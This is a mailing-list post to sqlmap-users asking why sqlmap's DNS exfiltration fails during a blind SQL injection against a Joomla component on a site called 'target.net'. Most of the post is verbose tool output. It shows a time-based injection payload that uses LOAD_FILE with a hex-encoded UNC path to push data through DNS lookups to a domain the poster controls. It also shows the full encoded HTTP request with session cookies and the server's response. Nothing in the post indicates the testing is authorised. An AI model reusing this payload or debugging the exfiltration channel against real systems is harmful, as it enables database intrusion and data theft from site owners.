Hey all, I’ve got a blind sqli that I’m exploiting with the latest sqlmap commit and am trying to get dns exfil to work, but am not having any luck.
I start sqlmap as root with the —dns-domain option set to a domain that I control and have the sqlmap machine set as the authoritative NS for. Running with a -v6, this is the info I get: =============================================== [18:22:18] [INFO] testing for data retrieval through DNS channel [18:22:18] [PAYLOAD] -2931 OR 7252=IF((ORD(MID((SELECT LOAD_FILE(CONCAT(0x5c5c5c5c4d776a2e,(SELECT HEX(MID((IFNULL(CAST(8315 AS CHAR),0x20)),1,31))),0x2e79564e2e73656375726566696c652e6e65745c5c7456414c))),6,1))>953),SLEEP(5),7252)-- PyBa [18:22:18] [TRAFFIC OUT] HTTP request [#3]: GET /administrator/index.php?option=com_mcsearch&templateId=-2931%20OR%207252%3DIF%28%28ORD%28MID%28%28SELECT%20LOAD_FILE%28CONCAT%280x5c5c5c5c4d776a2e%2C%28SELECT%20HEX%28MID%28%28IFNULL%28CAST%288315%20AS%20CHAR%29%2C0x20%29%29%2C1%2C31%29%29%29%2C0x2e79564e2e73656375726566696c652e6e65745c5c7456414c%29%29%29%2C6%2C1%29%29%3E953%29%2CSLEEP%285%29%2C7252%29--%20PyBa/&view=searchtemplate HTTP/1.1 Accept-language: en-us,en;q=0.5 Accept-encoding: gzip,deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-agent: Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.1) Gecko/2008071719 Firefox/3.0.1 Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 Pragma: no-cache Cache-control: no-cache,no-store Cookie: Login=1;activeProfile=16469185;serviceID=1320;91370904fbecd1edf649755d657f5d32=97t8br06sreu9r846bai0t2pj0;mcid_token=0c7264be-28af-41b8-8c77-01c4fdc395ec Connection: close [18:22:19] [TRAFFIC IN] HTTP response [#3] (200 OK): Content-length: 8627 Content-encoding: gzip Set-cookie: serviceID=1320; expires=Thu, 23-Jan-2014 00:22:20 GMT; path=/; httponly, serviceID=1320; expires=Thu, 23-Jan-2014 00:22:20 GMT; path=/; httponly, mcid_token=0c7264be-28af-41b8-8c77-01c4fdc395ec; expires=Thu, 22-Jan-2015 23:22:20 GMT; path=/; httponly Expires: Mon, 1 Jan 2001 00:00:00 GMT Vary: Accept-Encoding Uri: https://target.net:443/administrator/index.php?option=com_mcsearch&templateId=-2931%20OR%207252%3DIF%28%28ORD%28MID%28%28SELECT%20LOAD_FILE%28CONCAT%280x5c5c5c5c4d776a2e%2C%28SELECT%20HEX%28MID%28%28IFNULL%28CAST%288315%20AS%20CHAR%29%2C0x20%29%29%2C1%2C31%29%29%29%2C0x2e79564e2e73656375726566696c652e6e65745c5c7456414c%29%29%29%2C6%2C1%29%29%3E953%29%2CSLEEP%285%29%2C7252%29--%20PyBa/&view=searchtemplate Server: Apache Last-modified: Wed, 22 Jan 2014 23:22:20 GMT Connection: close Pragma: no-cache Cache-control: post-check=0, pre-check=0 Date: Wed, 22 Jan 2014 23:22:20 GMT P3p: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-type: text/html; charset=utf-8 [18:22:19] [DEBUG] performed 1 queries in 0.51 seconds [18:22:19] [ERROR] data retrieval through DNS channel failed. Turning off DNS exfiltration support =============================================== If I run a tcpdump on the sqlmap machine, I see dns requests come in for “target.net” and if I do manual dns queries to the domain I own, sqlmap responds as expected with localhost.domain.com. Any idea? Am I doing anything wrong? Chris ------------------------------------------------------------------------------ CenturyLink Cloud: The Leader in Enterprise Cloud Services. Learn Why More Businesses Are Choosing CenturyLink Cloud For Critical Workloads, Development Environments & Everything In Between. Get a Quote or Start a Free Trial Today. http://pubads.g.doubleclick.net/gampad/clk?id=119420431&iu=/4140/ostg.clktrk _______________________________________________ sqlmap-users mailing list sqlmap-users@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/sqlmap-users
